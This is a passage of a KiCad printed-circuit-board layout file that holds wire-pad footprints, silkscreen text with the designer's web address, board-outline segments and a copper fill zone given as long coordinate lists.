5.247983 14.468126) (xy 5.293299 14.600594) (xy 5.338753 14.701521) (xy 5.361205 14.73461) (xy 5.436651 14.759758) (xy 5.525076 14.710217)) (layer B.SilkS) (width 0.01)) ) (module Wire_Pads:SolderWirePad_single_0-8mmDrill (layer F.Cu) (tedit 5D908C82) (tstamp 5ABD66D0) (at 61.913046 41.809428) (fp_text reference "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (fp_text value "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (pad 1 thru_hole circle (at 0 0) (size 4 4) (drill 2.2) (layers *.Cu *.Mask Dwgs.User)) ) (module Wire_Pads:SolderWirePad_single_0-8mmDrill (layer F.Cu) (tedit 5D908C8D) (tstamp 5ABD66D0) (at 61.913046 79.8091) (fp_text reference "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (fp_text value "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (pad 2 thru_hole circle (at 0 0) (size 4 4) (drill 2.2) (layers *.Cu *.Mask Dwgs.User)) ) (module Wire_Pads:SolderWirePad_single_0-8mmDrill (layer F.Cu) (tedit 5D908C9B) (tstamp 5ABD66D0) (at 37.313144 97.009982) (fp_text reference "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (fp_text value "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (pad 3 thru_hole circle (at 0 0) (size 4 4) (drill 2.2) (layers *.Cu *.Mask Dwgs.User)) ) (module Wire_Pads:SolderWirePad_single_0-8mmDrill (layer F.Cu) (tedit 5D908C93) (tstamp 5ABD66D0) (at 138.11305 82.209399) (fp_text reference "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (fp_text value "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (pad 4 thru_hole circle (at 0 0) (size 4 4) (drill 2.2) (layers *.Cu *.Mask Dwgs.User)) ) (module Wire_Pads:SolderWirePad_single_0-8mmDrill (layer F.Cu) (tedit 5D908C87) (tstamp 5ABD66D0) (at 138.11305 44.009067) (fp_text reference "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (fp_text value "" (at 0 0) (layer F.SilkS) (effects (font (size 1.27 1.27) (thickness 0.15))) ) (pad 5 thru_hole circle (at 0 0) (size 4 4) (drill 2.2) (layers *.Cu *.Mask Dwgs.User)) ) (gr_text https://josefadamcik.cz (at 54.87 118.86 22) (layer B.SilkS) (tstamp 5DA529B5) (effects (font (size 2 2) (thickness 0.3)) (justify mirror)) ) (gr_text https://josefadamcik.cz (at 54.73 118.93 22) (layer F.SilkS) (effects (font (size 2 2) (thickness 0.3))) ) (gr_line (start 156.72 103.850003) (end 138.00693 105.35553) (layer Edge.Cuts) (width 0.1)) (gr_line (start 138.00693 105.35553) (end 137.87083 105.374695) (layer Edge.Cuts) (width 0.1)) (gr_line (start 137.87083 105.374695) (end 137.739359 105.409486) (layer Edge.Cuts) (width 0.1)) (gr_line (start 137.739359 105.409486) (end 137.613724 105.45916) (layer Edge.Cuts) (width 0.1)) (gr_line (start 137.613724 105.45916) (end 137.495132 105.522972) (layer Edge.Cuts) (width 0.1)) (gr_line (start 137.495132 105.522972) (end 137.384792 105.600179) (layer Edge.Cuts) (width 0.1)) (gr_line (start 137.384792 105.600179) (end 137.283909 105.690036) (layer Edge.Cuts) (width 0.1)) (gr_line (start 137.283909 105.690036) (end 137.193693 105.791801) (layer Edge.Cuts) (width 0.1)) (gr_line (start 137.193693 105.791801) (end 137.11535 105.90473) (layer Edge.Cuts) (width 0.1)) (gr_line (start 137.11535 105.90473) (end 128.63003 119.84109) (layer Edge.Cuts) (width 0.1)) (gr_line (start 128.63003 119.84109) (end 128.544217 119.963427) (layer Edge.Cuts) (width 0.1)) (gr_line (start 128.544217 119.963427) (end 128.444621 120.072332) (layer Edge.Cuts) (width 0.1)) (gr_line (start 128.444621 120.072332) (end 128.332822 120.166918) (layer Edge.Cuts) (width 0.1)) (gr_line (start 128.332822 120.166918) (end 128.2104 120.246297) (layer Edge.Cuts) (width 0.1)) (gr_line (start 128.2104 120.246297) (end 128.078934 120.309581) (layer Edge.Cuts) (width 0.1)) (gr_line (start 128.078934 120.309581) (end 127.940004 120.355883) (layer Edge.Cuts) (width 0.1)) (gr_line (start 127.940004 120.355883) (end 127.79519 120.384315) (layer Edge.Cuts) (width 0.1)) (gr_line (start 127.79519 120.384315) (end 127.64607 120.39399) (layer Edge.Cuts) (width 0.1)) (gr_line (start 127.64607 120.39399) (end 111.92243 120.39399) (layer Edge.Cuts) (width 0.1)) (gr_line (start 111.92243 120.39399) (end 111.112584 120.366534) (layer Edge.Cuts) (width 0.1)) (gr_line (start 111.112584 120.366534) (end 110.307376 120.28442) (layer Edge.Cuts) (width 0.1)) (gr_line (start 110.307376 120.28442) (end 109.509567 120.148023) (layer Edge.Cuts) (width 0.1)) (gr_line (start 109.509567 120.148023) (end 108.72192 119.95772) (layer Edge.Cuts) (width 0.1)) (gr_line (start 108.72192 119.95772) (end 93.230791 115.65451) (layer Edge.Cuts) (width 0.1)) (gr_line (start 93.230791 115.65451) (end 92.771471 115.535267) (layer Edge.Cuts) (width 0.1)) (gr_line (start 92.771471 115.535267) (end 92.308773 115.431744) (layer Edge.Cuts) (width 0.1)) (gr_line (start 92.308773 115.431744) (end 91.843101 115.343996) (layer Edge.Cuts) (width 0.1)) (gr_line (start 91.843101 115.343996) (end 91.37486 115.272079) (layer Edge.Cuts) (width 0.1)) (gr_line (start 91.37486 115.272079) (end 90.904454 115.216048) (layer Edge.Cuts) (width 0.1)) (gr_line (start 90.904454 115.216048) (end 90.432286 115.175958) (layer Edge.Cuts) (width 0.1)) (gr_line (start 90.432286 115.175958) (end 89.958761 115.151863) (layer Edge.Cuts) (width 0.1)) (gr_line (start 89.958761 115.151863) (end 89.484283 115.14382) (layer Edge.Cuts) (width 0.1)) (gr_line (start 89.484283 115.14382) (end 74.265711 115.14382) (layer Edge.Cuts) (width 0.1)) (gr_line (start 74.265711 115.14382) (end 73.778004 115.155451) (layer Edge.Cuts) (width 0.1)) (gr_line (start 73.778004 115.155451) (end 73.292233 115.190239) (layer Edge.Cuts) (width 0.1)) (gr_line (start 73.292233 115.190239) (end 72.809209 115.248029) (layer Edge.Cuts) (width 0.1)) (gr_line (start 72.809209 115.248029) (end 72.329746 115.328663) (layer Edge.Cuts) (width 0.1)) (gr_line (start 72.329746 115.328663) (end 71.854654 115.431984) (layer Edge.Cuts) (width 0.1)) (gr_line (start 71.854654 115.431984) (end 71.384747 115.557837) (layer Edge.Cuts) (width 0.1)) (gr_line (start 71.384747 115.557837) (end 70.920837 115.706064) (layer Edge.Cuts) (width 0.1)) (gr_line (start 70.920837 115.706064) (end 70.463736 115.87651) (layer Edge.Cuts) (width 0.1)) (gr_line (start 70.463736 115.87651) (end 38.384845 128.71743) (layer Edge.Cuts) (width 0.1)) (gr_line (start 38.384845 128.71743) (end 38.182618 128.7777) (layer Edge.Cuts) (width 0.1)) (gr_line (start 38.182618 128.7777) (end 37.97795 128.799904) (layer Edge.Cuts) (width 0.1)) (gr_line (start 37.97795 128.799904) (end 37.77549 128.78565) (layer Edge.Cuts) (width 0.1)) (gr_line (start 37.77549 128.78565) (end 37.579887 128.736548) (layer Edge.Cuts) (width 0.1)) (gr_line (start 37.579887 128.736548) (end 37.39579 128.654208) (layer Edge.Cuts) (width 0.1)) (gr_line (start 37.39579 128.654208) (end 37.227849 128.540239) (layer Edge.Cuts) (width 0.1)) (gr_line (start 37.227849 128.540239) (end 37.080713 128.39625) (layer Edge.Cuts) (width 0.1)) (gr_line (start 37.080713 128.39625) (end 36.95903 128.22385) (layer Edge.Cuts) (width 0.1)) (gr_line (start 36.95903 128.22385) (end 23.484592 104.88135) (layer Edge.Cuts) (width 0.1)) (gr_line (start 23.484592 104.88135) (end 23.439432 104.79485) (layer Edge.Cuts) (width 0.1)) (gr_line (start 23.439432 104.79485) (end 21.138128 99.891379) (layer Edge.Cuts) (width 0.1)) (gr_line (start 21.138128 99.891379) (end 21.009749 99.59706) (layer Edge.Cuts) (width 0.1)) (gr_line (start 21.009749 99.59706) (end 20.897977 99.296817) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.897977 99.296817) (end 20.802967 98.991355) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.802967 98.991355) (end 20.724879 98.681379) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.724879 98.681379) (end 20.663868 98.367594) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.663868 98.367594) (end 20.620092 98.050707) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.620092 98.050707) (end 20.593709 97.731422) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.593709 97.731422) (end 20.584876 97.410444) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.584876 97.410444) (end 20.583476 20.705454) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.583476 20.705454) (end 20.60688 20.473281) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.60688 20.473281) (end 20.674005 20.257034) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.674005 20.257034) (end 20.780217 20.061347) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.780217 20.061347) (end 20.920886 19.890851) (layer Edge.Cuts) (width 0.1)) (gr_line (start 20.920886 19.890851) (end 21.091378 19.750179) (layer Edge.Cuts) (width 0.1)) (gr_line (start 21.091378 19.750179) (end 21.287063 19.643964) (layer Edge.Cuts) (width 0.1)) (gr_line (start 21.287063 19.643964) (end 21.503308 19.576838) (layer Edge.Cuts) (width 0.1)) (gr_line (start 21.503308 19.576838) (end 21.73548 19.553434) (layer Edge.Cuts) (width 0.1)) (gr_line (start 21.73548 19.553434) (end 116.82034 19.553513) (layer Edge.Cuts) (width 0.1)) (gr_line (start 116.82034 19.553513) (end 117.853904 19.581354) (layer Edge.Cuts) (width 0.1)) (gr_line (start 117.853904 19.581354) (end 119.026052 19.657282) (layer Edge.Cuts) (width 0.1)) (gr_line (start 119.026052 19.657282) (end 120.19525 19.769898) (layer Edge.Cuts) (width 0.1)) (gr_line (start 120.19525 19.769898) (end 121.21996 19.907805) (layer Edge.Cuts) (width 0.1)) (gr_line (start 121.21996 19.907805) (end 156.78493 25.673169) (layer Edge.Cuts) (width 0.1)) (gr_line (start 156.78493 25.673169) (end 156.986606 25.724797) (layer Edge.Cuts) (width 0.1)) (gr_line (start 156.986606 25.724797) (end 157.171354 25.809479) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.171354 25.809479) (end 157.336109 25.923613) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.336109 25.923613) (end 157.477801 26.063594) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.477801 26.063594) (end 157.593363 26.225819) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.593363 26.225819) (end 157.679727 26.406683) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.679727 26.406683) (end 157.733825 26.602583) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.733825 26.602583) (end 157.75259 26.809914) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.75259 26.809914) (end 157.77959 102.701305) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.77959 102.701305) (end 157.758674 102.921116) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.758674 102.921116) (end 157.698297 103.127381) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.698297 103.127381) (end 157.602256 103.315983) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.602256 103.315983) (end 157.474347 103.482807) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.474347 103.482807) (end 157.318368 103.623736) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.318368 103.623736) (end 157.138114 103.734656) (layer Edge.Cuts) (width 0.1)) (gr_line (start 157.138114 103.734656) (end 156.937382 103.81145) (layer Edge.Cuts) (width 0.1)) (gr_line (start 156.937382 103.81145) (end 156.71997 103.850003) (layer Edge.Cuts) (width 0.1)) (gr_line (start 156.71997 103.850003) (end 156.72 103.850003) (layer Edge.Cuts) (width 0.1)) (gr_line (start 156.72 103.850003) (end 156.72 103.850003) (layer Edge.Cuts) (width 0.1)) (zone (net 0) (net_name "") (layer F.Cu) (tstamp 5DA529E9) (hatch edge 0.508) (connect_pads (clearance 0.508)) (min_thickness 0.254) (fill yes (arc_segments 32) (thermal_gap 0.508) (thermal_bridge_width 0.508)) (polygon (pts (xy 20 18.6) (xy 19.9 98.9) (xy 38 130.7) (xy 72.2 115.9) (xy 91.7 116.1) (xy 110.7 121) (xy 131 121) (xy 138.9 106.4) (xy 158.3 104.5) (xy 158.8 25.6) (xy 118.9 18.5) (xy 19.9 18.5) ) ) (filled_polygon (pts (xy 116.811138 20.238513) (xy 117.822526 20.265757) (xy 118.971069 20.340156) (xy 120.116717 20.450504) (xy 121.119476 20.585457) (xy 156.644907 26.344412) (xy 156.757122 26.373139) (xy 156.830971 26.406989) (xy 156.897066 26.452776) (xy 156.95425 26.50927) (xy 157.000887 26.574738) (xy 157.035534 26.647297) (xy 157.05716 26.725609) (xy 157.067602 26.840974) (xy 157.094579 102.668904) (xy 157.082933 102.791291) (xy 157.058855 102.873549) (xy 157.020383 102.9491) (xy 156.968762 103.016426) (xy 156.90581 103.073304) (xy 156.833604 103.117736) (xy 156.75355 103.148362) (xy 156.632486 103.169831) (xy 137.965149 104.671679) (xy 137.944732 104.672531) (xy 137.93164 104.674375) (xy 137.918459 104.675435) (xy 137.898347 104.679063) (xy 137.835061 104.687974) (xy 137.827941 104.687719) (xy 137.768344 104.697369) (xy 137.741996 104.701079) (xy 137.73511 104.70275) (xy 137.728119 104.703882) (xy 137.702399 104.710688) (xy 137.643725 104.724927) (xy 137.637264 104.727925) (xy 137.622778 104.731758) (xy 137.616014 104.732314) (xy 137.55763 104.748998) (xy 137.531594 104.755888) (xy 137.525274 104.758244) (xy 137.518784 104.760099) (xy 137.493711 104.770012) (xy 137.436842 104.791216) (xy 137.431072 104.794779) (xy 137.418506 104.799748) (xy 137.412092 104.801042) (xy 137.355844 104.824523) (xy 137.330569 104.834517) (xy 137.324782 104.837491) (xy 137.318774 104.839999) (xy 137.294829 104.852883) (xy 137.240627 104.880737) (xy 137.235502 104.884806) (xy 137.224265 104.890852) (xy 137.218122 104.892861) (xy 137.164944 104.922772) (xy 137.140923 104.935697) (xy 137.135585 104.939285) (xy 137.129985 104.942435) (xy 137.107658 104.958058) (xy 137.056998 104.992111) (xy 137.052439 104.996695) (xy 137.041989 105.004007) (xy 137.036051 105.006753) (xy 136.986772 105.042643) (xy 136.964508 105.058222) (xy 136.959572 105.062454) (xy 136.95431 105.066286) (xy 136.934 105.084377) (xy 136.887736 105.124038) (xy 136.883696 105.129182) (xy 136.873606 105.13817) (xy 136.867826 105.141721) (xy 136.823313 105.182966) (xy 136.803176 105.200902) (xy 136.798596 105.205868) (xy 136.79365 105.210451) (xy 136.775788 105.230599) (xy 136.73462 105.275239) (xy 136.731081 105.28103) (xy 136.721141 105.292242) (xy 136.715554 105.296666) (xy 136.67643 105.342677) (xy 136.658793 105.362571) (xy 136.654639 105.368303) (xy 136.650047 105.373703) (xy 136.634868 105.395583) (xy 136.599452 105.444451) (xy 136.596478 105.450921) (xy 136.56006 105.503418) (xy 136.547765 105.519757) (xy 136.540878 105.531068) (xy 136.533347 105.541924) (xy 136.523415 105.559749) (xy 128.056498 119.465887) (xy 128.008849 119.533816) (xy 127.968717 119.577699) (xy 127.923624 119.61585) (xy 127.874165 119.64792) (xy 127.821052 119.673487) (xy 127.765017 119.692162) (xy 127.706663 119.703619) (xy 127.623877 119.70899) (xy 111.93402 119.70899) (xy 111.158998 119.682715) (xy 110.399949 119.605308) (xy 109.647884 119.476732) (xy 108.894096 119.29461) (xy 93.440936 115.001948) (xy 93.435484 114.999944) (xy 93.408577 114.992959) (xy 93.381712 114.985496) (xy 93.375973 114.984494) (xy 92.96491 114.877779) (xy 92.953869 114.874141) (xy 92.932358 114.869328) (xy 92.911029 114.863791) (xy 92.899548 114.861987) (xy 92.479824 114.768079) (xy 92.468682 114.764822) (xy 92.447029 114.760742) (xy 92.4255 114.755925) (xy 92.413964 114.754511) (xy 91.991598 114.674924) (xy 91.980347 114.672044) (xy 91.958546 114.668696) (xy 91.93688 114.664613) (xy 91.925317 114.663592) (xy 91.50063 114.598364) (xy 91.489289 114.595867) (xy 91.467379 114.593257) (xy 91.445592 114.589911) (xy 91.434005 114.589282) (xy 91.007347 114.538462) (xy 90.995932 114.536351) (xy 90.973964 114.534486) (xy 90.952062 114.531877) (xy 90.940452 114.53164) (xy 90.512196 114.495279) (xy 90.5007 114.493553) (xy 90.478658 114.492431) (xy 90.456711 114.490568) (xy 90.445108 114.490724) (xy 90.015565 114.468868) (xy 90.004012 114.467532) (xy 89.981966 114.467158) (xy 89.959968 114.466039) (xy 89.948363 114.466589) (xy 89.523728 114.459391) (xy 89.51793 114.45882) (xy 89.490038 114.45882) (xy 89.462251 114.458349) (xy 89.456465 114.45882) (xy 74.291168 114.45882) (xy 74.283017 114.458213) (xy 74.257564 114.45882) (xy 74.232064 114.45882) (xy 74.223917 114.459622) (xy 73.778957 114.470234) (xy 73.762634 114.469798) (xy 73.745364 114.471035) (xy 73.728036 114.471448) (xy 73.711813 114.473438) (xy 73.260584 114.505752) (xy 73.244267 114.506093) (xy 73.227037 114.508154) (xy 73.209742 114.509393) (xy 73.193667 114.512147) (xy 72.745052 114.56582) (xy 72.728785 114.566935) (xy 72.711659 114.569815) (xy 72.694426 114.571877) (xy 72.678514 114.575389) (xy 72.233245 114.650273) (xy 72.217056 114.652159) (xy 72.200081 114.655851) (xy 72.18296 114.65873) (xy 72.167237 114.662993) (xy 71.726038 114.758944) (xy 71.70994 114.7616) (xy 71.693156 114.766095) (xy 71.676208 114.769781) (xy 71.660708 114.774786) (xy 71.22427 114.891675) (xy 71.208312 114.895095) (xy 71.191781 114.900377) (xy 71.175031 114.904863) (xy 71.159767 114.910606) (xy 70.728828 115.048298) (xy 70.713034 115.052478) (xy 70.696803 115.058531) (xy 70.680301 115.063803) (xy 70.6653 115.070277) (xy 70.248271 115.225782) (xy 70.240411 115.228064) (xy 70.21674 115.237539) (xy 70.192881 115.246436) (xy 70.185539 115.250029) (xy 38.159275 128.069883) (xy 38.046739 128.103422) (xy 37.964958 128.112294) (xy 37.883768 128.106578) (xy 37.804827 128.086762) (xy 37.730525 128.05353) (xy 37.663179 128.007827) (xy 37.60439 127.950296) (xy 37.536675 127.854357) (xy 26.139455 108.110333) (xy 105.844667 108.110333) (xy 105.844667 109.0205) (xy 105.844669 109.020525) (xy 105.844667 109.02092) (xy 105.844832 109.272523) (xy 105.844845 109.272656) (xy 105.84484 109.275337) (xy 105.845066 109.320022) (xy 105.845066 109.32005) (xy 105.846037 109.513224) (xy 105.846038 109.513236) (xy 105.846141 109.521985) (xy 105.849368 109.694396) (xy 105.850133 109.700938) (xy 105.849748 109.707513) (xy 105.850161 109.71644) (xy 105.856413 109.833889) (xy 105.859912 109.856899) (xy 105.860565 109.880166) (xy 105.861748 109.889023) (xy 105.87202 109.962043) (xy 105.873783 109.969325) (xy 105.874272 109.9768) (xy 105.888466 110.029982) (xy 105.901407 110.083443) (xy 105.904547 110.090237) (xy 105.906481 110.097482) (xy 105.909676 110.105827) (xy 105.924962 110.144946) (xy 105.947644 110.189569) (xy 105.968576 110.235048) (xy 105.975901 110.245161) (xy 105.981559 110.256293) (xy 106.012482 110.295668) (xy 106.041844 110.336208) (xy 106.050992 110.344705) (xy 106.058706 110.354527) (xy 106.096683 110.387142) (xy 106.133364 110.421211) (xy 106.140512 110.426574) (xy 106.161807 110.442323) (xy 106.197326 110.463569) (xy 106.231392 110.487131) (xy 106.250828 110.49557) (xy 106.269001 110.50644) (xy 106.307981 110.520386) (xy 106.345965 110.536878) (xy 106.366664 110.54138) (xy 106.386607 110.548515) (xy 106.42755 110.554623) (xy 106.468016 110.563425) (xy 106.476899 110.5644) (xy 106.5052 110.56731) (xy 106.539411 110.567472) (xy 106.573467 110.57066) (xy 106.601711 110.567766) (xy 106.630105 110.5679) (xy 106.663686 110.561416) (xy 106.697721 110.557928) (xy 106.706467 110.556092) (xy 106.735712 110.549742) (xy 106.775628 110.563862) (xy 106.784318 110.565945) (xy 106.806564 110.571114) (xy 106.8492 110.576713) (xy 106.891433 110.584905) (xy 106.900335 110.58568) (xy 107.084345 110.600413) (xy 106.680103 111.72501) (xy 106.680088 111.725051) (xy 106.598852 111.951097) (xy 106.598851 111.951103) (xy 106.598813 111.951205) (xy 106.474952 112.29605) (xy 106.474948 112.296065) (xy 106.474909 112.296172) (xy 106.398715 112.508442) (xy 106.398713 112.508447) (xy 106.356506 112.626032) (xy 106.356504 112.626039) (xy 106.356458 112.626165) (xy 106.248153 112.928103) (xy 106.24815 112.928113) (xy 106.248093 112.92827) (xy 106.154526 113.189348) (xy 106.154523 113.189361) (xy 106.154435 113.189601) (xy 106.080246 113.396883) (xy 106.080236 113.396924) (xy 106.080065 113.397392) (xy 106.029894 113.537941) (xy 106.029886 113.537974) (xy 106.029698 113.53849) (xy 105.882126 113.95309) (xy 105.868183 114.009046) (xy 105.853407 114.064745) (xy 105.853098 114.069584) (xy 105.851925 114.07429) (xy 105.84912 114.131808) (xy 105.845439 114.189397) (xy 105.846076 114.194208) (xy 105.84584 114.199048) (xy 105.854265 114.256055) (xy 105.861834 114.313222) (xy 105.863392 114.317813) (xy 105.864101 114.322612) (xy 105.883452 114.376932) (xy 105.901969 114.431504) (xy 105.904389 114.435706) (xy 105.906017 114.440275) (xy 105.935542 114.489789) (xy 105.964314 114.539738) (xy 105.967505 114.543391) (xy 105.969989 114.547556) (xy 106.008542 114.590363) (xy 106.046494 114.633803) (xy 106.050338 114.636769) (xy 106.053579 114.640368) (xy 106.099691 114.674855) (xy 106.14538 114.710113) (xy 106.149725 114.712276) (xy 106.153605 114.715177) (xy 106.205547 114.740055) (xy 106.257204 114.765762) (xy 106.261887 114.767039) (xy 106.266256 114.769132) (xy 106.322084 114.783459) (xy 106.377708 114.798631) (xy 106.382542 114.798974) (xy 106.387242 114.80018) (xy 106.444812 114.803391) (xy 106.5023 114.807469) (xy 106.511232 114.807166) (xy 107.119101 114.782298) (xy 107.180638 114.773712) (xy 107.242034 114.765224) (xy 107.242412 114.765093) (xy 107.242809 114.765038) (xy 107.301055 114.744819) (xy 107.360085 114.724412) (xy 107.360436 114.724207) (xy 107.360808 114.724078) (xy 107.413946 114.692974) (xy 107.46796 114.661447) (xy 107.46826 114.661182) (xy 107.468605 114.66098) (xy 107.514726 114.620114) (xy 107.561551 114.578729) (xy 107.561797 114.578406) (xy 107.562092 114.578145) (xy 107.599393 114.529105) (xy 107.637292 114.479406) (xy 107.637468 114.479047) (xy 107.63771 114.478729) (xy 107.66475 114.423429) (xy 107.692299 114.367266) (xy 107.69256 114.366554) (xy 107.692577 114.366519) (xy 107.692588 114.366477) (xy 107.695374 114.358875) (xy 107.846964 113.936167) (xy 108.504847 113.936167) (xy 108.507643 113.943641) (xy 108.507672 113.94372) (xy 108.66602 114.367053) (xy 108.691459 114.41896) (xy 108.71612 114.471204) (xy 108.718917 114.474988) (xy 108.720988 114.479214) (xy 108.756003 114.525164) (xy 108.790363 114.571652) (xy 108.793844 114.574823) (xy 108.796694 114.578563) (xy 108.839994 114.61686) (xy 108.882703 114.655764) (xy 108.886726 114.658194) (xy 108.890255 114.661315) (xy 108.940168 114.690471) (xy 108.989621 114.72034) (xy 108.994047 114.721945) (xy 108.998108 114.724317) (xy 109.052689 114.743208) (xy 109.107046 114.762918) (xy 109.111699 114.763633) (xy 109.116144 114.765171) (xy 109.173355 114.773101) (xy 109.230504 114.781878) (xy 109.239431 114.782304) (xy 109.547649 114.794849) (xy 109.547804 114.79484) (xy 109.553308 114.795054) (xy 109.645794 114.797999) (xy 109.657143 114.79725) (xy 109.668466 114.798319) (xy 109.677402 114.798224) (xy 109.803571 114.796008) (xy 109.805143 114.795826) (xy 109.806722 114.795945) (xy 109.867274 114.78863) (xy 109.927647 114.781638) (xy 109.929149 114.781155) (xy 109.930726 114.780965) (xy 109.939437 114.778972) (xy 110.0007 114.764503) (xy 110.012346 114.760518) (xy 110.024462 114.758407) (xy 110.071347 114.740331) (xy 110.11888 114.724067) (xy 110.129519 114.717903) (xy 110.141006 114.713474) (xy 110.183512 114.686619) (xy 110.226956 114.661447) (xy 110.236195 114.653334) (xy 110.246603 114.646758) (xy 110.28307 114.612171) (xy 110.320811 114.579029) (xy 110.323189 114.575931) (xy 110.343119 114.590065) (xy 110.375328 114.616252) (xy 110.393961 114.626123) (xy 110.411153 114.638316) (xy 110.449013 114.655287) (xy 110.485702 114.674724) (xy 110.493993 114.678058) (xy 110.700173 114.759328) (xy 110.743302 114.771624) (xy 110.785681 114.786282) (xy 110.794385 114.788304) (xy 110.8228 114.794697) (xy 110.854265 114.798605) (xy 110.885216 114.805527) (xy 110.894093 114.806554) (xy 111.185056 114.838194) (xy 111.244585 114.838824) (xy 111.30413 114.839998) (xy 111.309814 114.839514) (xy 111.309955 114.839515) (xy 111.310088 114.83949) (xy 111.313034 114.839239) (xy 111.594962 114.813231) (xy 111.596525 114.812931) (xy 111.598117 114.812932) (xy 111.657942 114.801136) (xy 111.717626 114.789674) (xy 111.719096 114.789078) (xy 111.720663 114.788769) (xy 111.729201 114.786133) (xy 111.917923 114.726432) (xy 111.926377 114.73108) (xy 111.953619 114.739721) (xy 111.979784 114.751201) (xy 112.013007 114.75856) (xy 112.045437 114.768847) (xy 112.073829 114.772032) (xy 112.101735 114.778213) (xy 112.135753 114.778978) (xy 112.169564 114.782771) (xy 112.1785 114.782833) (xy 112.6865 114.782833) (xy 112.744657 114.777131) (xy 112.802888 114.772161) (xy 112.806781 114.771039) (xy 112.81081 114.770644) (xy 112.866728 114.753761) (xy 112.922909 114.737569) (xy 112.926511 114.735712) (xy 112.930385 114.734542) (xy 112.982013 114.707092) (xy 113.033924 114.680323) (xy 113.037089 114.677808) (xy 113.040671 114.675903) (xy 113.085963 114.638964) (xy 113.131708 114.602606) (xy 113.134333 114.599514) (xy 113.137466 114.596958) (xy 113.174669 114.551988) (xy 113.209198 114.511303) (xy 113.246672 114.546108) (xy 113.283946 114.574488) (xy 113.319783 114.604657) (xy 113.333544 114.612251) (xy 113.346051 114.621774) (xy 113.388121 114.64237) (xy 113.429141 114.665008) (xy 113.437373 114.668484) (xy 113.65336 114.757915) (xy 113.684644 114.767416) (xy 113.70034 114.774525) (xy 113.716338 114.778268) (xy 113.738486 114.786352) (xy 113.747154 114.788521) (xy 113.755216 114.790479) (xy 113.765275 114.791902) (xy 113.772876 114.79421) (xy 113.793075 114.796223) (xy 113.82196 114.802982) (xy 113.830827 114.804097) (xy 113.982595 114.822111) (xy 114.014929 114.822771) (xy 114.047052 114.826478) (xy 114.055988 114.826569) (xy 114.252838 114.827197) (xy 114.271576 114.82542) (xy 114.29039 114.826215) (xy 114.299309 114.825656) (xy 114.508915 114.81107) (xy 114.528181 114.807818) (xy 114.54771 114.80718) (xy 114.556562 114.805956) (xy 114.7466 114.778328) (xy 114.781853 114.769622) (xy 114.817708 114.763833) (xy 114.826333 114.761494) (xy 114.933645 114.731588) (xy 114.973631 114.744272) (xy 115.014364 114.759896) (xy 115.033042 114.763118) (xy 115.051104 114.768847) (xy 115.094454 114.77371) (xy 115.137452 114.781126) (xy 115.156397 114.780658) (xy 115.175231 114.782771) (xy 115.184167 114.782833) (xy 115.692167 114.782833) (xy 115.752582 114.776909) (xy 115.813283 114.771269) (xy 115.814855 114.770803) (xy 115.816477 114.770644) (xy 115.874581 114.753101) (xy 115.93304 114.735775) (xy 115.934489 114.735014) (xy 115.936052 114.734542) (xy 115.989761 114.705985) (xy 116.043622 114.677697) (xy 116.044892 114.676672) (xy 116.046338 114.675903) (xy 116.088561 114.641466) (xy 116.120714 114.666131) (xy 116.159784 114.698452) (xy 116.170168 114.704066) (xy 116.179544 114.711259) (xy 116.225055 114.733744) (xy 116.269657 114.75786) (xy 116.280933 114.761351) (xy 116.291528 114.766585) (xy 116.340519 114.779796) (xy 116.388977 114.794796) (xy 116.400727 114.796031) (xy 116.412127 114.799105) (xy 116.462741 114.802549) (xy 116.513199 114.807852) (xy 116.524957 114.806782) (xy 116.536745 114.807584) (xy 116.545675 114.807255) (xy 116.831414 114.794738) (xy 116.831427 114.794738) (xy 117.117177 114.78222) (xy 117.156244 114.776654) (xy 117.195599 114.773921) (xy 117.21793 114.767865) (xy 117.240834 114.764602) (xy 117.278062 114.751559) (xy 117.31615 114.74123) (xy 117.336884 114.73095) (xy 117.358715 114.723301) (xy 117.392707 114.703272) (xy 117.428057 114.685745) (xy 117.446392 114.67164) (xy 117.466329 114.659892) (xy 117.495783 114.633642) (xy 117.527056 114.609582) (xy 117.542308 114.592176) (xy 117.559576 114.576786) (xy 117.583367 114.545318) (xy 117.609374 114.515639) (xy 117.620953 114.495605) (xy 117.622336 114.493777) (xy 117.633138 114.51444) (xy 117.635303 114.517133) (xy 117.636944 114.520191) (xy 117.674433 114.565802) (xy 117.711404 114.611785) (xy 117.714061 114.614014) (xy 117.716256 114.616685) (xy 117.761823 114.654092) (xy 117.807088 114.692073) (xy 117.810124 114.693742) (xy 117.812799 114.695938) (xy 117.864793 114.723796) (xy 117.916544 114.752247) (xy 117.919847 114.753295) (xy 117.922897 114.754929) (xy 